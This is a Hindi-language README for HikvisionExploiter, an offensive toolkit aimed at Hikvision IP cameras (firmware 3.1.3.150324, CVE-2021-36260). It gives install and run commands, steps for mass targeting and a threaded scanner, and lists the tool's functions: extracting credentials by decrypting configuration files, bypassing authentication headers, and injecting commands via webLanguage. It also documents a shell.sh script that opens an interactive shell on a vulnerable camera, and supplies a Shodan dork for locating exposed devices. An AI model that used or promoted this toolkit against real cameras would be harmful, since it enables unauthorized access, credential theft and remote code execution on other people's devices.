
HikvisionExploiter एक Python-आधारित उपकरण है जिसे Hikvision नेटवर्क कैमरों पर शोषण और निर्देशिका पहुँच जाँच को स्वचालित करने के लिए डिज़ाइन किया गया है, जो वेब इंटरफ़ेस संस्करण 3.1.3.150324 का शोषण करता है + CVE-2021-36260 डिटेक्शन।
HikvisionExploiter एक शक्तिशाली और स्वचालित शोषण टूलकिट है जो Hikvision IP कैमरों पर बिना प्रमाणीकरण वाले एंडपॉइंट्स को लक्षित करता है, विशेष रूप से उन उपकरणों को जो फर्मवेयर संस्करण 3.1.3.150324 चला रहे हैं।
यह निम्न कार्य करता है:
शोधकर्ताओं, रेड टीमर्स और IoT सुरक्षा उत्साही लोगों के लिए निर्मित।
/onvif-http/snapshot एंडपॉइंट की पुष्टि करता है/System/configurationFile डाउनलोड करता है, AES + XOR का उपयोग करके डिक्रिप्ट करता है, और क्रेडेंशियल निकालता है/Security/users पर हेडर बायपास जाँचwebLanguage इंजेक्शन के माध्यम से PUT-से-फ़ाइल RCE जाँचlogs/ में प्रति IP:port संरचित लॉग बनाता हैThreadPoolExecutor का उपयोग करके हजारों टारगेट्स को सपोर्ट करता हैpip install -r requirements.txtffmpeg (वैकल्पिक, भविष्य में स्नैपशॉट-से-वीडियो क्षमता के लिए)pycrypto (कॉन्फ़िग डिक्रिप्शन के लिए):
pip install pycrypto
git clone https://github.com/HexBuddy/HikvisionExploiter.git
cd HikvisionExploiter
pip3 install -r requirements.txt
निम्नलिखित प्रारूप के साथ targets.txt फ़ाइल बनाएँ:
IP:PORT
उदाहरण:
192.168.1.10:80
10.10.10.20:81
python3 checker.py
यह निम्न कार्य करेगा:
logs/IP_PORT_TIMESTAMP/ के अंतर्गत सहेजेगाकिसी असुरक्षित डिवाइस पर इंटरैक्टिव रूप से कमांड चलाने के लिए:
chmod +x shell.sh
./shell.sh <ip:port>
उदाहरण:
./shell.sh 192.168.1.10:80
यदि असुरक्षित है, तो आप एक इंटरैक्टिव शेल में प्रवेश करेंगे:
hikvision-shell> uname -a
Linux hik-cam 3.0.8 #1 Wed Mar 18 ...
एक्सपोज़्ड Hikvision कैमरों का पता लगाने के लिए निम्नलिखित Shodan dork का उपयोग करें:
3.1.3.150324
एक Nuclei-संगत टेम्पलेट शामिल है: nuclei-template.yaml
उपयोग:
nuclei -t nuclei-template.yaml -list targets.txt
पता लगाता है:
MIT लाइसेंस ©
अधिक विवरण के लिए LICENSE देखें।
टेलीग्राम: @HexBuddy127001
केवल शैक्षिक और नैतिक अनुसंधान के लिए ❤️ के साथ निर्मित।